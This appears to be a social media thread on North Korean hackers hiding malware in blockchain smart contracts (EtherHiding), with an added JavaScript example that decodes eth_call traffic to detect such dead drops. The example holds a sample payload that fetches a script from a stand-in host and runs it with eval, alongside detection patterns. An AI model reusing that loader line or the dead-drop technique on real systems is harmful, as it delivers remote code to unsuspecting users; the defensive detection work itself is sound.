jsr · 191d

NEW: 🇰🇵 DPRK hackers have begun hiding malware on blockchain.

Result: decentralized, immutable malware from a government crypto theft operation.

https://blossom.primal.net/a107de401a522d0914a28dec26d00b96e8444e3d25259e14cfaa04a023b098b4.png

It only cost $1.37 USD in gas fees per malware change (e.g. to update the command & control server).

https://blossom.primal.net/4ba1cadacaac86882f3363c59e5320db53dd97c6a53fe5a689e49387e81eaa36.png

Blockchains as malware dead drops are a fascinating, predictable evolution for nation state attackers.

https://blossom.primal.net/29d96437b500d63006608b3bba6fdf5ae776c29ff697dfb7485b7aafbbbe38e7.png

And blockchain explorers are a natural target.

https://blossom.primal.net/4a0cb4b61499359f7d3048d03000f6cce432c7211615a8029f1f7515c379de35.png

Nearly impossible to remove.

https://blossom.primal.net/816dce991b4bd694b9def92d508ae5c35f77df7fd13627ebeb5c8f223e538407.png

Experimentation with putting malware on blockchains is in its infancy.

Ultimately there will be some efforts to try and implement social engineering protection around this, but combined with things like agentic AI & vibe coding by low-information people... whew boy, this gold seam is going to be productive for a long time.

Still, where here they used social engineering, I expect attackers to also experiment with directly loading zero-click exploits onto blockchains targeting things like blockchain explorers & other systems that process blockchains... especially if they are sometimes hosted on the same systems & networks that handle transactions / have wallets.

REPORT: https://cloud.google.com/blog/topics/threat-intelligence/dprk-adopts-etherhiding
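An added example, not code from the original post or from the Google report it links, to make the mechanism above concrete from the defender's side. In EtherHiding the victim-side loader fetches its next stage with a read-only JSON-RPC `eth_call` against the dead-drop contract, which burns no gas and creates no transaction, while the operator changes the stored string with an ordinary transaction (the per-change gas fee quoted in the post). The code below builds such a request, decodes the ABI-encoded `string` a Solidity `view` getter returns, and flags payload-like content the way an analyst reviewing proxy captures would. The contract address, function selector and payload are constructed placeholders; only Node's standard library is used.

```javascript
// Added example: decode the EtherHiding dead-drop read path from the defender's
// side. Contract address, selector and payload below are constructed for
// illustration and are not taken from the original post or the report.

const pad32 = (n) => BigInt(n).toString(16).padStart(64, "0");

// ABI-encode one dynamic `string` return value the way a Solidity
// `function payload() view returns (string)` does: a 32-byte offset (0x20),
// a 32-byte byte length, then the UTF-8 bytes right-padded to 32 bytes.
function abiEncodeString(str) {
  const bytes = Buffer.from(str, "utf8");
  const padded = Buffer.alloc(Math.ceil(bytes.length / 32) * 32);
  bytes.copy(padded);
  return "0x" + pad32(32) + pad32(bytes.length) + padded.toString("hex");
}

// Inverse of the above, with bounds checks so a malformed or truncated RPC
// response raises instead of yielding garbage.
function abiDecodeString(data) {
  if (!/^0x(?:[0-9a-fA-F]{2})*$/.test(data)) throw new Error("return data is not hex");
  const buf = Buffer.from(data.slice(2), "hex");
  const word = (at) => {
    if (at + 32 > buf.length) throw new Error("return data too short");
    return Number(BigInt("0x" + buf.subarray(at, at + 32).toString("hex")));
  };
  const offset = word(0);
  const length = word(offset);
  if (offset + 32 + length > buf.length) throw new Error("string length exceeds return data");
  return buf.subarray(offset + 32, offset + 32 + length).toString("utf8");
}

// The request a compromised page's loader sends to any public RPC endpoint.
// `to` is the dead-drop contract and `data` the 4-byte selector of its getter.
// A read-only call has no sender, burns no gas and writes nothing to the chain,
// so the only evidence is in the victim's browser and network traffic.
function buildEthCallRequest(contract, selector, id = 1) {
  return {
    jsonrpc: "2.0",
    id,
    method: "eth_call",
    params: [{ to: contract, data: selector }, "latest"],
  };
}

// Pull the hunting-relevant fields out of a captured request: which contract a
// page is reading and which function it calls. A page that is not a dApp has
// no business making these calls at all.
function describeEthCall(req) {
  if (req.method !== "eth_call") return null;
  const { to, data } = req.params[0];
  return { contract: to.toLowerCase(), selector: data.slice(0, 10).toLowerCase() };
}

// Decode a captured response and flag strings that look like a second stage
// (remote fetch, dynamic code execution, inline script) rather than dApp data.
const INDICATORS = [/https?:\/\//i, /\beval\s*\(/, /\bFunction\s*\(/, /\batob\s*\(/, /<script/i, /document\.write/];
function inspectDeadDropResponse(rpcResponse) {
  const payload = abiDecodeString(rpcResponse.result);
  const hits = INDICATORS.filter((re) => re.test(payload)).map((re) => re.source);
  return { payload, suspicious: hits.length > 0, hits };
}

// Constructed sample traffic: the stored string points the loader at an
// operator-controlled host and evaluates whatever comes back.
const SAMPLE_CONTRACT = "0x0000000000000000000000000000000000001234"; // placeholder address
const SAMPLE_SELECTOR = "0xdeadbeef"; // placeholder; real selectors are keccak256(signature)[0:4]
const SAMPLE_PAYLOAD = 'fetch("https://c2.example/stage2.js").then(r=>r.text()).then(s=>eval(s))';
const SAMPLE_REQUEST = buildEthCallRequest(SAMPLE_CONTRACT, SAMPLE_SELECTOR);
const SAMPLE_RESPONSE = { jsonrpc: "2.0", id: 1, result: abiEncodeString(SAMPLE_PAYLOAD) };

if (typeof require !== "undefined" && require.main === module) {
  console.log(describeEthCall(SAMPLE_REQUEST));
  console.log(inspectDeadDropResponse(SAMPLE_RESPONSE));
}
```

The practical takeaway for detection is in `describeEthCall`: because the read leaves no on-chain trace, the contract address and selector seen in outbound `eth_call` traffic from pages that have no wallet functionality are the indicator worth alerting on, and the decoded return value is what to pivot on once a contract is identified.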
This is also a thing using ordinals - gone are the days when you have to use finicky DNS and dead servers; set a block hash to load remote exploits and you're off!
lol
✍️✍️ https://simplex.chat/contact#/?v=2-7&smp=smp%3A%2F%2F6iIcWT_dF2zN_w5xzZEY7HI2Prbh3ldP07YTyDexPjE%3D%40smp10.simplex.im%2FsYV2mEEBg_35Vyg2-0rW3-Bn9P2CR5ll%23%2F%3Fv%3D1-3%26dh%3DMCowBQYDK2VuAyEAJqIWZVzk9WmEKv7cNlqPM7hXQ2ACwLwWiSiw5uTTywQ%253D%26srv%3Drb2pbttocvnbrngnwziclp2f4ckjq65kebafws6g4hy22cdaiv5dwjqd.onion
If explorers are vulnerable:
→ fix explorers.
Not:
→ attack decentralized storage.
The real irony: blockchains are actually better forensic platforms than the web. Every malicious payload is timestamped, indexed, permanent, globally visible. Which makes tracking attackers easier, not harder.

One-liner truth: malware doesn’t become dangerous because of where it’s stored — it becomes dangerous because of how it’s executed.
nostr:nevent1qqsfky92ep6p2lgqs68v7pwfvcldh985fln2ju42ka7nzzgtfn22lzcpzemhxue69uhhyetvv9ujuurjd9kkzmpwdejhg3f8rcr